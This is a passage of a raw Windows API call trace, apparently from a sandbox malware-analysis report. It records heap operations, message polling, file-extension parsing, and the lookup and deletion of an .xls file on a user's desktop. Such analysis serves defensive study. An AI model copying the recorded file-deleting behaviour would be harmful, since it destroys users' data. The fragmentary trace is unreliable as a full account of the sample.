wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.466] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.466] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.466] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.466] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.466] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.466] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.466] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls", lpFilePart=0x0) returned 0x58 [0031.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0031.466] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f62b900, ftCreationTime.dwHighDateTime=0x1d5c31a, ftLastAccessTime.dwLowDateTime=0x5360f1c0, ftLastAccessTime.dwHighDateTime=0x1d5c17e, ftLastWriteTime.dwLowDateTime=0x12a37400, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xf4c4, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="R99f_hoG0iVXG.xls", cAlternateFileName="R99F_H~1.XLS")) returned 0x7c2240 [0031.466] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\r99f_hog0ivxg.xls")) returned 1 [0031.468] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f62b900, ftCreationTime.dwHighDateTime=0x1d5c31a, ftLastAccessTime.dwLowDateTime=0x5360f1c0, ftLastAccessTime.dwHighDateTime=0x1d5c17e, ftLastWriteTime.dwLowDateTime=0x12a37400, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xf4c4, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="R99f_hoG0iVXG.xls", cAlternateFileName="R99F_H~1.XLS")) returned 0 [0031.468] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0031.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0031.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0031.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0031.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0031.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0031.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0031.468] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0031.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0031.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0031.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0031.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0031.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0031.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0031.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0031.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0031.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0031.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0031.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0031.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0031.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0031.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0031.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0031.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0031.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0031.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0031.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0031.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0031.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0031.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0031.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0031.469] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0031.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0031.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0031.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0031.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0031.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0031.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0031.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0031.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0031.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0031.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0031.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0031.470] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0031.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0031.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0031.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af568 [0031.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0031.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0031.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0031.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0031.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8891f0 [0031.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0031.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0031.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0031.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0031.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0031.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0031.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0031.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0031.470] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0031.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0031.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0031.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0031.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0031.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0031.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0031.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0031.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0031.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0031.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0031.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0031.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0031.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0031.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0031.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0031.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0031.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0031.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.471] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.472] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ls", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.472] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xls", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.472] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xls", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0031.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0031.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0031.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0031.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0031.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0031.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0031.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.472] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0031.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0031.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.472] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0031.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0031.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0031.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0031.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0031.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0031.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0031.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0031.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0031.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0031.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0031.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0031.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0031.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0031.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0031.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0031.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0031.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0031.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0031.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0031.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0031.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0031.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0031.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0031.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0031.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0031.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0031.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0031.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0031.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0031.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0031.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.473] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0031.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0031.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0031.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0031.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0031.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0031.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0031.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0031.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0031.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0031.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0031.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0031.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5758 [0031.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0031.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0031.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0031.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0031.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0031.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0031.474] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0031.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0031.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0031.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0031.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0031.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0031.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0031.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0031.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0031.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0031.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0031.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0031.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0031.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0031.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0031.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0031.475] HeapFree (in: hHeap=0x770000, 